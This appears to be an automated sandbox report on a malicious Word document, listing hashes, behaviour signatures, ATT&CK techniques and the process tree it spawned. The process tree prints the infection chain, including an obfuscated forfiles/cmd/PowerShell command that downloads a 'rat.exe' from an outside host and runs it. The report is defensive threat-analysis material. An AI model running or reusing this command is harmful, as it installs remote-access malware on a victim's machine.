Analysis

  • max time kernel
    104s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    02-08-2022 17:39

General

  • Target

    laburo.doc

  • Size

    525KB

  • MD5

    9e5e0266ab23b4cbc05272e0376866f7

  • SHA1

    b8e7bf8f15fa371fefa5d84e42c5cf3929ca3df6

  • SHA256

    7a40a331fa7a62c03e2560207db1e63a2fa30f99d5feb55d4af98508e35bc7f1

  • SHA512

    db7feb0d1f5c33c88eae27679c461ea662c008a3a6629f5deed36e391c84ddc3852bf4f9d708caf21bbfb94914e77aa4c80c0d457ac602af2168905c886f9118

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\laburo.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32 url.dll,OpenURL C:\Users\Public\ali.lnk
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\fOrfiLeS.exe
        "C:\Windows\system32\fOrfiLeS.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://915111.ru/wp-includes/rat.e^xe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\SysWOW64\cmd.exe
          /c pow^ers^hell/W 01 c^u^rl htt^ps://915111.ru/wp-includes/rat.e^xe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell /W 01 curl https://915111.ru/wp-includes/rat.exe -o C:\Users\Public\xczuy.exe;C:\Users\Public\xczuy.exe
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:888
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1992

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\ali.lnk
      Filesize

      1000B

      MD5

      20b63ef69781ec23752c0f50c0ada377

      SHA1

      af7ca8e522d44c8e2273ebbef58fdc63d61fefa9

      SHA256

      1855f0eb1eefcf0078fccc88749a7259737fbdd48c1c433775502d3bbfa538c2

      SHA512

      fe869af1d24c8648893306b1aebb0e75c1fdc1a2d16ab2527e8a196318143f49393098c384126bc787d26a6629b7b269ed459fa68465d53dd6af8c758adc5548

    • \??\PIPE\srvsvc
      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/888-70-0x000000006B4C0000-0x000000006BA6B000-memory.dmp
      Filesize

      5.7MB

    • memory/888-69-0x0000000004C50000-0x00000000052A1000-memory.dmp
      Filesize

      6.3MB

    • memory/888-68-0x000000006B4C0000-0x000000006BA6B000-memory.dmp
      Filesize

      5.7MB

    • memory/888-66-0x0000000000000000-mapping.dmp
    • memory/1700-64-0x0000000000000000-mapping.dmp
    • memory/1808-71-0x000000007190D000-0x0000000071918000-memory.dmp
      Filesize

      44KB

    • memory/1808-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1808-60-0x00000000005D7000-0x00000000005DB000-memory.dmp
      Filesize

      16KB

    • memory/1808-76-0x000000007190D000-0x0000000071918000-memory.dmp
      Filesize

      44KB

    • memory/1808-59-0x00000000005D7000-0x00000000005DB000-memory.dmp
      Filesize

      16KB

    • memory/1808-58-0x0000000076281000-0x0000000076283000-memory.dmp
      Filesize

      8KB

    • memory/1808-57-0x000000007190D000-0x0000000071918000-memory.dmp
      Filesize

      44KB

    • memory/1808-75-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1808-54-0x0000000072EA1000-0x0000000072EA4000-memory.dmp
      Filesize

      12KB

    • memory/1808-55-0x0000000070921000-0x0000000070923000-memory.dmp
      Filesize

      8KB

    • memory/1992-73-0x000007FEFC381000-0x000007FEFC383000-memory.dmp
      Filesize

      8KB

    • memory/1992-72-0x0000000000000000-mapping.dmp
    • memory/2012-65-0x0000000000000000-mapping.dmp
    • memory/2044-61-0x0000000000000000-mapping.dmp